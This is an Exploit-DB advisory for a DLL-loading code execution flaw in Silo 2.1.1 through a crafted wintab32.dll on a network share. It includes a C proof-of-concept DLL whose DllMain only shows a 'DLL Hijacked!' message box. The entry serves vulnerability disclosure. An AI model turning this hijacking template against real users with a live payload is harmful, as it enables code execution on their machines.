Silo 2.1.1 - 'wintab32.dll' DLL Loading Arbitrary Code Execution Vulnerability

2010-11-08T00:00:00
ID EDB-ID:34978
Type exploitdb
Reporter Gjoko Krstic
Modified 2010-11-08T00:00:00

Description

Silo 2.1.1 'wintab32.dll' DLL Loading Arbitrary Code Execution Vulnerability. Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/44726/info

Silo is prone to a vulnerability that lets attackers execute arbitrary code.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.

Silo 2.1.1 is vulnerable; other versions may also be affected. 

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}